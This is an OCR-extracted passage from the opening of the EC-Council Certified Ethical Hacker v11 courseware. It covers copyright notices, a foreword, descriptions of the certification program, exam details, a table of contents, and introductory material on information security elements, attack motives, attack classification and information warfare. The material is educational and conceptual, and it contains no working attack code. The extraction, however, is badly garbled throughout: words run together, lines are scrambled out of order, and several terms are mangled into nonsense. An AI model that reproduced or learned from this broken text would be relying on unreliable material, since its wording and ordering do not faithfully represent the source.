Ethical Hacking

and
Countermeasures
Version 11
EC-Council
Copyright ©2020byEC-Council. All rghtsreserved.Except undertheCopyright
as permitted Act of 1976,no part
ofthispublication
system,
entered, stored,
maybereproduced
or
andexecutedina computer system,
withtheexception
but maynot be reproduced
in
distributedin anyformor byanymeans, or stored a database
withoutthepriorwritten permission of thepublisher,
for publication
or retrieval
thattheprogramlistings maybe
withoutthe prior
‘writen ofthe publisher,
permission exceptin the case of briefquotations
embodiedin eritcalreviews andcertain
othernoncommercial uses permitted bycopyright law.For permission write to EC-Counell,
requests, addressed
"attention:E¢-Counei,―atthe
address below:
EC-Council
NewMexico
201 SunAve NE
Albuquerque,
NM 87109,
Informationcontainedin thispublication has beenobtainedbyEC-Counel fromsources believedtobereliable,EC:
Counciltakesreasonable measures to ensure that the contentis currentand accurate: however, because of the
possibilty
of human or mechanical error, we do not guarantee the accuracy,adequacy,or completenessof any
informationandare not responsible for anyerrors or omissions nor forthe accuracyofthe resultsobtainedfrom
use ofsuchinformation.

‘The
courseware isa resultof extensive research
a ndcontributionsfrom subject-matter expertsfromall over the
‘world.
Duecreditsforall suchcontributions andreferencesare givenin the courseware in the researchendnotes.
Weare committed to protectingintellectual
propertyrights.
If youate a copyright owner (anexclusivelicenseeor

their
agent)
or
of an agreed
Council
andyou believethatany partof the courseware constitutesa n infringement
licensecontract, youmaynotifyus at legal@eccounci.or.
willemove thematerialin question
of copyright,
In theevent ofa justified
andmake necessary eectifications,
ora breach
complaint,EC:

‘The
courseware maycontainreferences to
shouldnot beconsidered
are encouraged
Readers
as an endorsement other
informationresources andsecurity
af ar recommendation byEC-Councl
solutions,
but suchreferences

at legal@eccounciLorg.
andinaccuracles to EC-Council
to reporterrors,o missions, if you
please
haveanyissues, contact us at support@eccounciLor,

NOTICETO THEREADER

or
E-Couneldoesnot warrant guaranteeanyof the products,
analysis
doesit performany independent in connection
methodologies,
or frameworks
with anyofthe product
described
informationcontained
hereinnor
herein,EC:

Council
assume,
expressly
provided
‘might
anyto
doesnot
obtain
include
ll other
and
toi bythemanufacturer.
beindicated
disclaims,obligation
Thereaderis expressly
bytheactivitiesdescribed
and
warnedto consider
hereinandto avoidal potential
information
andadopt safety
hazards,Byfolowing
thanthat
precautionsthat
theinstruction
containedherein,the readerwillinglyassumes allrisksin connection with suchinstructions. EC-Councilmakesno

representations
warranties
any
kind,
including
but
nat warranties
or
or merchantablity, of
fitness
particular
of
nor are anysuchrepresentations
Counciltakesn o responsiblity
limitedto the
implied
for
with respectto thematerialsetforth herein,
with respectto suchmaterial.EC-Council
purpose
andEC:
shallnot be liablefor any special,

exemplary
damages
consequential,
or
or
upon resulting,
in whole in part,fromthe reader's use of or reliance this

tial andCountermessues
Hacking
©
Copyrightoy E-Cumel
 Foreword
Since youare reading
this CEHvL1courseware, you most likelyrealizethe importance
of
information
systems However,
security. compiling
we wouldlike to put forthour motive behind
a
resource
asone
You might
and
whatgaincourse.
such this
asking
find yourself
youcan
whatsetsthiscourse
fromthis
fromthe othersout there.Thetruth is
apart
single address
that no
issues
of being ina
courseware can
the rate at whichexploits,
Moreover,
all the
tools,
informationsecurity detailed
andmethodsare
manner.
discoveredbythe security
makesi t difficultforone programto cover all the necessary
community facetsofinformation
This
doesn’t
security.
that
this
course inany worked
mean is inadequate way as we have
all majordomainsin sucha manner thatthereaderwill be ableto appreciate
hasevolvedover time as well as gain insight
to cover
thewaysecurity
i n to the fundamentalworkings
relevantto each
domain.
and with
It is a blendofacademic
can readily tools
practical supplemented
access in orderto obtaina hands-on
wisdom
experience
thatthereader

emphasis
‘The throughoutthe courseware is on gainingpractical
know-how,
whichexplainsthe
stresson freeandaccessibletools.Youwill readabout some ofthe most widespreadattacks
seen,the populartoolsusedbyattackers, andhowattackshavebeencarriedout usingordinary
resources.
‘You
is a resource
methodology
to
mayalsowant knowwhatto expect
material.Anypenetration
or sequence
once youhavecompleted

of stepsthat you can followwhileauditing

thecourse. Thiscourseware
tester can tell you that there is no one straight
a clientsite. Thereis no
one template that will meet all your needs.Your testing strategy will vary with the client, the
basicinformation aboutthe system or situation,and the resources at your disposal. However,
for eachstage
findsomething
you choose be it enumeration,
—

firewall,
penetration
in thiscourseware that you can definitelyuse. -
of otherdomains youwill

Finally,this is not the end!Thiscourseware is to be considereda constant work-in-progress

becausewe will be adding value to this courseware over time. You mayfind some aspects
extremely detailed, whileothersmayhavelessdetail.Weare constantly asking ourselvesi f the
content helps explain the core pointof the lesson, and we constant calibrateour materialwith
that in mind.Wewouldlove to hearyour viewpoints and suggestions so please sendus your
feedbackto helpin our questto constantly improve our courseware.
About the EC-CouncilCEHProgram
Ifyou want to stophackers frominvading your network,firstyou've gotto invadetheirminds.
Computers aroundthe world are systematicallybeingvictimizedby rampanthacking. This
hacking
a system,
not onlywidespread,
stealeverything
butis being
executed
of valueandcompletely flawlessly
so
that
erase theirtracks.
theattackers compromise

goalof the ethicalhackeris to helpthe organization

‘The take preemptive measures against
maliciousattacksbyattacking the systemhimself; all the whilestaying withinlegal limits.This
philosophy stemsfromthe proven practice of tryingto catcha thief,bythinking like a thief. As
technology advances andorganization depend on technology increasingly,information assets

andof
haveevolvedinto criticalcomponents survival

If involves
hacking creativitythinking ‘out-of-the-box’,
auditswill not ensure the security
adequately protected
proofing
their informationassets,
then
ofan organization. testing
vulnerability andsecurity
To ensure thatorganizations
theymust adoptthe approach
have
of ‘defense in

depth’.
In other words, theymust penetrate their networksandassessthesecurity posturefor
vulnerabilitiesandexposure.
EthicalHackeris an individualwho is usually
‘The employedwith the organization andwho can

same methods
as
a Hacker.Hacking
undera contract between isa
a n Ethical
networks
betrustedto undertakean attemptto penetrate
felony
insome itis by
and/or computer systems
countries. When done request
Hackerandan organization,
usingthe
and
Themost important
itis legal.
pointis that an EthicalHackerhasauthorizationto probe
the target.
‘The
CEHProgram certifies
individuals

officers,
of security
specific
i n the
security
discipline
network Hacking ofEthical
TheCertifiedEthicalHackercertificationwill fortifythe
from a vendor-neutralperspective.
application
knowledge auditors, professionals,
security site administrators,
and anyonewho is concernedabout the integrityof the networkinfrastructure.A Certified
EthicalHackeris a skilled professional who understandsand knowshow to look for the
weaknesses andvulnerabilitiesin targetsystemsand usesthe same knowledge
andtoolsas @
malicioushacker.
To achieve you must passtheCEHexam 312-50,
the CertifiedEthicalHackerCertification,
Pleasevisit https://www.eccouncil.org/programs/certified-ethical-hacker-ceh_
for more
information.

CoursePrerequisites
It is highlyrecommended that candidatespursuing this course have a fundamental
understandingof operatingsystems, computernetworks,
file systems, TCP/IPprotocols,
information controls,
security basicnetworktroubleshooting,
dataleakage,
data backup,
and
riskmanagement.
About EC-Council
‘The
InternationalCouncilof Electronic
Commerce Consultants, betterknownas EC-Council, was
foundedi n late 2001 to addressthe needfor well-educated andcertifiedinformationsecurity
and e-business EC-Council
practitioners. is a global,
member-based organization composed of
industryandsubject matter expertsworking together
to set the standards and raise the bar i n
information securitycertification
andeducation.
EC-Council first developedtheCertifiedEthicalHacker(C|EH)
programwith the goal of teaching
the methodologies, tools,andtechniques usedbyhackers.Leveragingthe collectiveknowledge
of hundredsof subject-matter experts,the CEHprogramhasrapidly gained popularity around
world
aroundthe globe.
a s the benchmark
centers.Itis considered 145 more
950
‘the andis now deliveredi n more than countries by
for manygovernment
than authorized training
entities andmajorcorporations

through
EC-Council,
developed
its impressivenetwork
a rangeof other leading
certifications
ofprofessionals andhugeindustry
programsi n informationsecurity
a re viewedas the essential
following,also
ande-business.
EC-Councilhas
certificationsneededwhenstandardconfiguration
and
security policycourses fall short. Providinga true, hands-on,tacticalapproachto security,
individualsarmedwith the knowledge disseminated byEC-Councilprogramsare tightening
security
networks
world at game,
aroundthe

Programs
Other EC-Council
andbeating hackers their own

Awareness:CertifiedSecureComputer
Security User
| trainingprogramis to provide
Thepurposeof the CSCU studentswith

NetworkDefense:
CertifiedNetworkDefender
| Studentsenrolledin theCertified
NetworkDefender
course will gain @

Certed| na Deter

technologies
so thatstudents
mayunderstand
hownetworks howautomation software
operate,
behaves,
andhowto analyze
networksandtheirdefense.
Students detect,andrespond
willlearnhowto protect, a swellas learning
to thenetworkattacks
aboutnetworkdefensefundamentals, the application
of networksecuritycontrols,
protocols,
perimeter appliances,
secure IDS, VPN,andfirewallconfiguration.
Studentswill alsolearnthe
analysis,
intricacies of networktraffic signature, and vulnerability
scanning,whichwill helpi n

designing
security
policies
successful
incident
improved
response
plans.
These
network
will helporganizationsfosterresiliency
and
andoperational during
continuity attacks.
skills

CertifiedPenetrationTesting
PenetrationTesting: Professional
CPENT certificationrequires you to demonstratethe application
of
! advancedpenetrationtesting techniques such as advanced
CPENT
Pind
irtows secs. tor sytem: atiacs, airanced binaries
exploitation,
exploitswriting, bypassing
a filtered network,
birt
Operational
with pivotinganddoublepivoting, (OT)
Technologypen testing,accessinghiddennetworks
privilege andevading
escalation, defense mechanisms,
EC-Council’s CPENTstandardizes the knowledgebasefor penetration testingprofessionalsby
incorporatingbestpractices followedbyexperienced expertsi n the field. Theobjectiveof the
CPENT i s to ensure thateachprofessional followsa strict codeof ethics, is exposed
to the best
practices i n the domainof penetrationtestingand aware of all the compliance requirements
required
bytheindustry.
Unlikea normalsecurity
professionals
recommend
possess credential
an
certification,
the CPENT
skillsto analyzethe security
corrective measuresauthoritatively.
providesassurancethat security
postureof a network exhaustively
FormanyyearsEC-Council
and
hasbeencertifying
ITSecurity
security
Professionals

thereby
expertise making
around
defensemechanisms.
the globe
to ensure theseprofessionals
EC-Council’s
theseprofessionals
credentials
more sought
are proficient

after byorganizations
i n network
vouchfor their professionalism and
andconsulting
firmsglobally

Forensics:
Computer Computer Forensic
Hacking Investigator
Computer HackingForensicInvestigator
(CHFI)is a comprehensive
course covering major forensicinvestigation
scenarios. It enables
studentsto acquirecrucialhands-onexperiencewith various forensic
investigationtechniques. Studentslearn how to utilize standard
forensictools to successfully carry out a computerforensic
preparing themto betterald i n the prosecution
Investigation, of perpetrators.
CHFI certifiesindividualsi n the specific
EC-Council’s securitydiscipline
of computer
forensics
froma vendor-neutralperspective. TheCHF!certificationbolsterstheapplied
knowledgeoflaw
enforcement personnel, system administrators, officers,
security andmilitary
defense personnel,
legal
professionals,bankers, securityprofessionals,
andanyonewho is concernedaboutthe
of networkinfrastructures.
integrity
IncidentHandling:
EC-Council
CertifiedIncidentHandler

Ee-Coamel
|Certiied
effectively
ineident Mandier
handlepostbreachconsequencesbyreducing of the incident,
the impact fromboth
anda reputational
a financial perspective.
EICIH
i s a method-driven
programthat uses a holisticapproach to cover vast concepts
concerning organizational
incidenthandling and response from preparing and planning the
incidenthandling
responseprocess to recoveringorganizational
assetsaftera security
incident,
Theseconcepts a re essentialfor handlingand responding to securityincidentsto protect
fromfuturethreats attacks.
organizations
or
ertifiedChiefInformationSecurity Officer
TheCertified
ChiefInformation Officer(CCISO)
Security programwas
developedbyEC-Councilto fill a knowledge gap i n the information
securityindustry.Most information certifications
security focuson
specific capabilities.
toolsor practitioner Whenthe CCISO program was
developed,no certification
existedto recognizethe knowledge, skills,
and aptitudesrequired
for an experienced informationsecurity professional
to perform the
dutiesofa CISOeffectively
andcompetently. at thattime, manyquestions
In fact, existedabout
a really
what CISO
TheCCISO
wasvaluetoan
Body
andthe
of Knowledge
thisroleadds
helps
organization,
to define the role of the CISOand clearly outline the
contributionsthis personmakesi n an organization. EC-Councilenhancesthis information
through trainingopportunities conductedas instructor-ledor self-study modulesto ensure
candidateshavea complete understanding of the role.EC-Councilevaluates the knowledge of
CCISO candidateswith a rigorous exam that tests their competence across five domainswith

a
which seasoned securityleader
should
befamiliar.

Application CertifiedApplication
Security: Security
Engineer
TheCertiedApplication Security
Engineer
|. «Gi | (CASE)credential―is developedi n
CASE
[tee se a
CASE
|
rest, 2 08 spzieatinans
software development. expertsglobally
The CASEcredentialtests. the critical
securityski and knowledge required
throughout
atypical development
software (SDLC),
lifecycle focusingon the importanceof the
implementation
of secure methodologies
and practicesi n today’s
insecure operating
environment.
‘The
CASE trainingprogramis developed
certified concurrently professionals
to preparesoftware
with the necessarycapabilitiesthat are expected
byemployers and academiaglobally.tt
is
designed comprehensive
to bea hands-on, application course thatwill help
security software
professionals create secure applications.Thetrainingprogram encompassessecurity activities
involvedin all phases oftheSoftware DevelopmentLifecycle(SDLC):planning,creating,testing,
an
anddeployingapplication.
Unlikeotherapplication security
just
CASEgoesbeyond theguidelines
trainings, on secure coding
practicesand includes secure requirement robustapplication
gathering, design, and handling
security
issues
inpostdevelopment
the most comprehensive
engineers,analysts,
phases
of
certifications
testersglobally,
application
on themarket
andrespected
development.
today.
byhiring
This makes
bysoftware
Itis desired
authorities.
CASE o ne of
application

CertifiedThreat Intelligence
IncidentHandling: Analyst
CertifiedThreatIntelligence is designed
anddeveloped
| in collaboration
Analyst
(C|TIA)
with cybersecurity
andthreatintelligence experts

CT]Atins
tmni[rntuanen
across

treats comprehensive
sutured approse
the globeto helporganizations
risksbyconverting
specilitevel
fr balding
ifs
identify
te teathen
eectve test telignce,
and mitigate

program
business
unknowninternalandexternalthreatsinto known

In theever-changing
threatlandscape, C|TIA ThreatIntelligence
is an essential training
program
for those who deal with cyberthreats on a dailybasis.Organizations todaydemanda
professional-level
cybersecurity threat intelligenceanalystwho can extract theintelligence
from
data byimplementing various advanced strategies. Suchprofessional-level ThreatIntelligence
training
programs
to governmentonly when
can
core
ofcurricula
andindustry mapscomplian
beachieved
published
the the
threat intelligenceframeworks.
with andis

IncidentHandling:
CertifiedSOC
Analyst
SOCAnalyst
TheCertified programis thefirststepto joining a
(CSA)
| center (SOC).
securityoperations It is engineered
aspiringTier | and Tier MlSOCanalysts
for current and
to achieve proficiency
in
performing entry-level
andintermediate-level
operations.
CSAis a trainingand credentialing
programthat helps the candidate

some of the most experiencedtrainers i n the industry.

Theprogramfocuses on creating
n ew
career through
opportunities extensive, meticulousknowledgewith enhancedlevelcapabilities
fordynamically
contributing
the fundamentals
correlation,
to
aSOC
of SOCoperations,
SIEMdeployment,
advanced
team.
Beingan intense 3-day
before relaying
incident
detection,
program,it thoroughly
the knowledge
covers
of logmanagementand
Additionally,
andincidentresponse.
thecandidatewill learnto managevarious SOC andcollaboratewithCSIRT
processes at the time
of
need,
CEHExam Information
CEHExamDetails
ExamTitle CertifiedEthicalHacker(CEH)
ExamCode 312-50
ExamPortal(please
EC-Council visit https://www.eccexam.com)
Availability (please https://home.pearsonvue.com/eccouncil)
‘WUE visit
Duration
Questions
4.Hours
125
Score
Passing Pleasereferhttps://cert.eccouncil.org/fag.html

Pleasevisit https://cert.eccouncil.org/certified-ethical-hacker.html
for more information.
Table of Contents
01: toEthical
‘Module Introduction
InformationSecurity
Overview
Hacking

CyberkillChain
Concepts
HackingConcepts
EthicalHacking
Concepts
InformationSecurity
Controls
InformationSecurity
LawsandStandards

Module
02:Concepts andReconnaissance
Footprinting
Footprinting
through
Footprinting SearchEngines
through
Footprinting WebServices
Footprinting
throughSocialNetworking
Sites
WebsiteFootprinting,
EmailFootprinting

Whois
Footprinting
DNSFootprinting
NetworkFootprinting
Footprinting
through
SocialEngineering

Footprinting
Tools
Footprinting
Countermeasures

03:
Scanning
‘Module
NetworkScanning
Networks
Concepts
‘Scanning
Tools
HostDiscovery
PortandServiceDiscovery
(Banner
5 Discovery Grabbing/OS Fingerprinting)
Beyond
‘Scanning IDSandFirewall
Draw NetworkDiagrams

04:
‘Module Enumeration
Concepts
Enumeration
NetBIOSEnumeration

tial andCountermessues
Hacking
©
Copyrightoy E-Cumel
 SNMPEnumeration
LDAPEnumeration
NTPandNFSEnumeration
‘SMTP
and DNSEnumeration
OtherEnumerationTechniques
Enumeration
Countermeasures

Module05: Vulnerability
Analysis
Vulnerability
AssessmentConcepts
Vulnerability
Classification
andAssessment Types
Vulnerability
AssessmentS olutionsandTools
Vulnerability
AssessmentReports

06:ConceptsHacking
‘Module System
Hacking
‘System
Gaining
Access
Escalating
Privileges
Maintaining
Clearing
Logs
Access

Module07:MalwareThreats
MalwareConcepts
APTConcepts
TrojanConcepts
VirusandWormConcepts
MalwareConcepts
Fileless
MalwareAnalysis
Countermeasures
Anti-MalwareSoftware

08:
‘ModuleSniffing
Sniffing
Concepts
Sniffing
Technique:
Sniffing
Technique:Attacks
MAC
Attacks
DHCP
Sniffing
Technique:
ARPPoisoning

Sniffing
Technique:
Spoofing Attacks

y E-Gounet
 Sniffing
Technique:
Sniffing
Tools
Poisoning
DNS

Countermeasures
Sniffing
Detection Techniques

09:SocialEngineering
‘Module

Engineering
Social
Concepts
Engineering
Social Techniques
InsiderNetworking
Threats
on Social
Impersonation Sites
Identity
Theft
Countermeasures

Module
10:
D0S/DDos
Denial-of-Service
Concepts
AttackTechniques
DoS/DD0S
Botnets
DDoSCaseStudy
DoS/DDoSAttackTools
Countermeasures
D0S/DDoSProtectionTools

Module
Session11: Hijacking
Session
Hijacking
Concepts
Application Hijacking
LevelSession
Hijacking.
NetworkLevelSession
Hijacking
Session Tools
Countermeasures

Module
12:IDS,and
1DS,
IPS,
EvadingFirewalls,Honeypots
Firewall, Concepts
andHoneypot
10S,
IPS,
Honeypot
Firewall,and
Evading
IDS
Solutions

Evading
Firewalls
Evading
1DS/Firewall Tools
Detecting
Honeypots

agex tial andCountermessues

Hacking
©
Copyrightoy E-Cumel
 1DS/Firewall
Evasion
Countermeasures

Web
Module13: Hacking Servers
WebServer Concepts
WebServer Attacks
WebServerAttackMethodology
WebServerAttackTools
Countermeasures
PatchManagement
WebServerSecurityTools

14: Hacking
‘Module WebApplications
WebApplication
Concepts
WebApplication
Threats
WebApplication Methodology
Hacking
andWebShell
WebAPI,Webhooks,
WebApplication
Security

Module15:SQLInjection
SQLInjection
Concepts
TypesofSQLInjection
Methodology
SQLInjection
Tools
SQLInjection
EvasionTechniques
Countermeasures

WirelessNetworks
16:Hacking
‘Module
Wireless
Concepts
WirelessEncryption
Wireless
Threats
WirelessHacking
Methodology
WirelessHacking
Tools
BluetoothHacking
Countermeasures
Wireless
Security
Tools

agex tial andCountermessues

Hacking
©
Copyrightoy E-Cumel
 17: Hacking
‘Module Mobile Platforms
MobilePlatform
AttackVectors
Hacking
AndroidOS
Hacking
iOS
MobileDevice Management
MobileSecurity
GuidelinesandTools

Module18:loTandOTHacking
loTConcepts
loT Attacks
oT Hacking
Methodology
loT Hacking
Tools
Countermeasures
OTConcepts
OTAttacks
OT Hacking
Methodology
Hacking
OT
Tools
Countermeasures

19:
Module
Cloud
Computing
Cloud

Computing
Concepts.
Container
Technology
Serverless
Computing
CloudComputing
Threats
CloudHacking
CloudSecurity

20: Cryptography
‘Module
Cryptography
Concepts
Encryption
Algorithms
Cryptography
Tools
Infrastructure(PKI)
PublicKey
EmailEncryption
DiskEncryption
Cryptanalysis
Countermeasures

y E-Gounet
Glossary
References
Appendix -
Hacking
A Ethical Essential
Concepts
-1

B
‘Appendix Hacking
-
Ethical Essential
Concepts
-
II
 ETHICAL
HACKING

|
Certified Ethical Hacker

Module01:
cote
Tal[0
cel
telah Mn
loler
dale]
Colaealcexe]
 Module Objectives
Understanding
the Elements
o f Infrmaton Security

Cverviwof Hacking
Concepts,
Typesa ndPhases

Ethical
Understanding Hacking andts Scope
Concepts

ofinformation
‘overview Secu ActsandLaws

Module Objectives
Attackers
breakinto systems
for various reasons andpurposes. Therefore,it is important to
understandhowmalicioushackersattackandexploit systemsandthe probable reasons behind
thoseattacks. you knowyourself
AsSunTzu states i n theArt of War,“If but not theenemy,for
every victorygained,
you will also suffer a defeat.―System administratorsand security
professionals
must guard their infrastructure byknowing
againstexploits the enemy—the
hacker(s]—who
‘malicious seeksto use the same infrastructurefor illegal
activities.
Thismodulestarts with of the current security
an overview scenario and emerging threat
vectors. It provides the differentelementsof information
insightinto security.Later,the
hacking
modulediscusses and ethical hackingconcepts and endswith a brief discussionon
informationsecurity controls andinformation lawsandacts.
security

AtDescribe
of elements
willbe
able
to:
the end thismodule,
+

of the
you
information security
+
Explaininformationsecurity attacksandinformationwarfare
+
Describecyber kill chainmethodology, TTPs,andloCs
+
Describe hacking concepts, types,andphases
Explainethicalhacking concepts andscope
Understand informationsecurity controls(defense-in-depth, cyber
riskmanagement,
threatintelligence, threatmodeling,incidentmanagement andAl/ML)
process,
Knowaboutthe information securityactsandlaws

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

°e ae @ ae

EthicalHacking Information
Se Information
Security

aK

Information Overview
Security
Information securityrefersto the protection or safeguarding of information and information
systemsthat use, store, and transmit informationfrom unauthorizedaccess,disclosure,
alteration, and destruction. Informationi s a criticalasset that organizationsmust secure. If
sensitive informationfalls into the wrong hands, then the respective may suffer
organization
huge lossesi n terms of finances, brandreputation, customers, or i n otherways.To providean
understanding
of how to secure suchcriticalinformationresources,thismodulestarts with an
overview of informationsecurity.
This section introducesthe elementsof information classification
security, of attacks,
and
informationwarfare.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
Elementsof InformationSecurity CEH
andinformation
services
Information sa stateofwel-being
secunty offormationan infrastructure
n which
thepossiblity
ofthet, tampering
dupion of and i s ow otlrabe

lntiality

of
deta
Integrity
ot
ewerces
preventing
orTherion ar of nropr wrote

Availability eure bytheauthoredwer

acumen ory tah

uthenticty

Non-epuaiion
||Seontettneseate
oan cel
ite
eyhn
ee megane

ElementsofInformation Security
Informationsecurity state of the well-being
is “the of informationandinfrastructurei n which
the possibility of theft,tampering, or disruption
of informationand services is kept low or
It relieson five majorelements:confidentiality,
tolerable.― availability,
integrity, authenticity,
andnon-repudiation.
=
Confidentiality
Confidentiality onlyto authorized
is the assurance that the informationis accessible
Confidentiality
Confidentiality
controlsinclude
(such
of equipment
may
breaches occur dueto improperdatahandling hacking
dataclassification,
USBdrives,
as DVDs, andBlu-ray
discs).
dataencryption,
attempt.
and properdisposal or
a
Integrity
Integrity
is the trustworthinessof dataor resources i n the prevention
of improperand
unauthorizedchanges—the assurance that informationis sufficiently
accurate for its
purpose.Measuresto maintain dataintegritymay includea checksum (anumber
produced bya mathematicalfunctionto verify
that a givenblockof datais not changed)
ensures that only
andaccess control(which authorizedpeople can update, add,or delete
data).
Availability
Availability
is the assurance that the systems responsiblefor delivering,
storing,and
processinginformationare accessible when required byauthorizedusers. Measuresto
maintain data availabilitycan includedisk arraysfor redundantsystems andclustered
machines, antivirus softwareto combat malware, and distributed denial-of-service
{0D05) preventionsystems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Authenticity
‘Authenticity
refersto the characteristic documents,
of communication, or anydatathat
ensures the qualityof beinggenuineor uncorrupted.Themajorroleof authenticationis
to confirmthat a user is genuine,Controlssuchas biometrics,
smart cards,anddigital
certificatesensure the authenticity of data, transactions,
communications, and
documents,
Non-Repudiation
Non-repudiationis a way to guarantee that the senderof a message cannot later deny
sent the message
having and that the recipient cannot denyhaving receivedthe
message.Individualsandorganizations use digitalsignaturesto ensure non-repudiation.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 j
Motives,Goals,and Objectives
of InformationSecurity
Attacks
C|EH
Attacks
Motive
(Goal)
Method
Vulnerability
= + +

of
|@ Amatweoriginates
out ofthe notion thatthe targets yst stores or processessomething
valuable,
and this
Teast the threat an attack onthe
system

polyinto
(@Auackersry various toolsand atacetechniques wuerabitiesi n a compute
to exploit s ystemoes secu
andcontrols oder ful thal motives

Motives
behind
information
security
attacks
formation| Acievnga
Steling wd nil ta sates ary objectives

resting
fear
andchsos ofthe
tage bydsruptingcrteal Daraying thereputation

Motives,
Goals,
and Objectives
ofInformation Security
Attacks
Attackersgenerally have motives (goals), and objectives behind their informationsecurity
attacks.A motive originates out of the notion that a targetsystemstores or processes
something valuable,whichleadsto the threatof an attackon the system. Thepurposeof the
attackmay be to disrupt the targetorganization's businessoperations, to stealvaluable
informationfor the sakeof curiosity, or even to exact revenge.Therefore, thesemotives or
goals depend on the attacker'sstate of mind,their reason for carryingout suchan activity,as
well as their resources and capabilities. Oncethe attackerdeterminestheir goal,theycan
employ various tools, attacktechniques, andmethodsto exploit vulnerabilitiesi n a computer
system or security policyandcontrols.

Motivesbehindinformationsecurity
=
Attacks Motive (Goal)
attacks
+ Method+ Vulnerability

+
Discupt
business
continuity Propagate
religious
or political
beliefs
+
Performinformationtheft Achievea state'smilitary
objectives
+
Manipulating
data
Createfearandchaosbydisrupting
criticalinfrastructures
thereputation
Damage
Takerevenge
of
the
target
Demandransom
financial
Bring lossto the target

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
Classificationof Attacks CEH

eu inoe vend c e ile

Besta
Hvenses be

Classificationof Attacks
Accordingto IATF, passive,active,close-in,
attacksare classifiedinto five categories:
security
insider,
anddistribution
Passive Attacks
Passive attacksinvolveintercepting and monitoring networktrafficanddataflow on the
targetnetworkanddo not
tamper with the data,Attackersperform
networkactivities usingsniffers.Theseattacks a re verydifficult
reconnaissance
to detectas theattacker
has no active interaction with the targetsystemor network.Passive attacksallow
on

attackersto capturethe data or filesbeing transmittedin the networkwithout the

consent of the user. For example, an attacker can obtain information such as
unencrypted datai n transit,clear-textcredentials,or other sensitive information that is
usefuli n performing active attacks.
Examples
of passiveattacks:
© Footprinting

©
Sniffing
andeavesdropping

Network
traffic analysis
©. Decryption
of weaklyencrypted
traffic
ActiveAttacks
attackstamperwith the datain transit or disrupt
‘Active communication or services
betweenthe systems to bypassor breakinto secured Attackerslaunchattacks
systems.
on the targetsystem
or networkbysending traffic
actively
that can bedetected.These

ical andCountermensores
Mackin ©by E-Comel
Copyright
attacksare performed on the targetnetworkto exploit
the information in transit. They
penetrateor infectthe target'sinternalnetworkandgain access to a remote system to
compromise the internalnetwork.

ofactive
Examples attacks:
(DoS)
attack Profiling
2

>
Denial-of-service
Bypassing mechanisms
protection
andIDS > Firewall attack

Malware (such
attacks as Arbitrary
codeexecution
viruses,worms, ransomware)
Privilege
escalation

Spoofing
of
Modification information
attacks
Backdoor
access

Cryptography
attacks
Replay
attacks attacks
Password-based SQL injection
X88attacks
hijacking
Session
Directory
traversalattacks
Man-in-the-Middleattack
Exploitation
of application
and
DNSandARPpoisoning. OSsoftware
© Compromised-key
attack
Close-inAttacks
Close-inattacksare performed whenthe attackeris i n closephysicalproximitywith the
targetsystem or network.Themain goal of performing
thistypeofattackis to gatheror
modify informationor disruptits access. Forexample, a n attackermightshouldersurf
user credentials. Attackersgain closeproximitythrough surreptitious
entry,open
access,or both,

Examples
of close-inattacks:
© Socialengineering
methods)
(Eavesdropping,
shouldersurfing,
dumpster
diving, andother

InsiderAttacks
bytrustedpersonswhohavephysical
Insiderattacksare performed access to the critical
of
assets the target.An insiderattackinvolvesusingprivileged
intentionally
cause a threat to the organization's
bypass
Insiderscan easily security
accessto violaterules
informationor informationsystems.
rules,corruptvaluableresources,andaccesssensitive
or
information.Theymisuse the organization's
assetsto directlyaffectthe confidentiality,
integrity,and availabilityof informationsystems.These attacksimpact the
organization's
business operations, and profit.Itis difficult to figure
reputation, out an

insider
attack
of insiderattacks:
Examples
and
© Eavesdropping wiretapping
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Theftofphysical
devices
Socialengineering
Datatheft andspoliation
> Podslurping
Planting or malware
backdoors,
keyloggers,
Distribution Attacks
Distributionattacksoccur whenattackerstamperwith hardwareor softwareprior to
installation.
Attackerstamperthe hardware or software
at its source or when it is i n
transit. Examplesof distributionattacksincludebackdoorscreatedby softwareor
hardwarevendorsat the time of manufacture.Attackersleverage thesebackdoors to
gainunauthorized accessto the targetinformation, or network.
systems,
© Modificationof softwareor hardwareduring
production
© Modificationof softwareor hardwareduring
distribution

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
InformationWarfare CEH
{©The
t erm information
to gain
warfare infer
competitive advantagesor refers
use
of tothe
over an opponent
information technloges
andcommunication (ICT)

1 defend
agaisttacks on
ICT
asets aqui
ICT
assets
techs the fan opponent

x= E== 2

rapurednst
oo
7

InformationWarfare
Source:http://www.iwar.org.uk
‘The
term informationwarfareor InfoWarrefersto the use of informationandcommunication
technologies
(ICT)for competitiveadvantages
over an of information
opponent.Examples
warfare weapons include viruses, worms, Trojan horses, logicbombs,trap doors,
nanomachines andmicrobes,
electronic
jamming,andpenetration
Martin Libickidividedinformationwarfareinto the following
andtools.
exploits
categories
*
Commandand control warfare (C2warfare): In the computer industry,
security C2
warfarerefersto the impacta n attackerpossessesover a compromisedsystemor
networkthat theycontrol.
Intelligence-based
warfare: Intelligence-based technology
warfare is a sensor-based
that directly
corruptstechnological According
systems. “intelligence-based
to Libicki,
is warfarethat consistsof the design,
warfare― anddenialof systems
protection, that
seek
sufficient
dominate
battlespace.
knowledgeto
Electronicwarfare:According
the
electronicwarfareuses radio-electronicand
to Libicki,
cryptographictechniques to degrade communication. Radioelectronictechniques
means of sending
attackthe physical information, whereascryptographic techniques
use bitsandbytes
to disruptthe means of sendinginformation,
Psychological
warfare:Psychological
warfareis the use of various techniques
suchas
propagandaandterror to demoralize adversary
one’s in an attemptto succeed i n battle.
Hackerwarfare:According to Libicki,
the purpose of this typeof warfare vary from
can
the shutdownof systems, dataerrors, theftof information, theft of services, system

ical andCountermensores
Mackin ©by E-Comel
Copyright
 and access to data. Hackersgenerally
falsemessaging,
monitoring, use viruses, logic
bombs,Trojan
horses,
andsniffersto perform
theseattacks
Economic warfare: Libickinotes that economic informationwarfare can affect the
economyof a businessor nation byblocking the flow of information.Thiscouldbe
especially
devastatingto organizationsthat do a lot of businessi n the digital
world
Cyberwarfare:definescyber
Libicki warfareas the use of information
systems
against
the virtual personas of individualsor groups. It is the broadestof all information
warfare. It includes information
terrorism,semanticattacks (similar
to Hacker warfare,
but insteadof harming a system,it takes over the systemwhile maintaining the
perception that it is operatingcorrectly),
and simula-warfare(simulated war, for
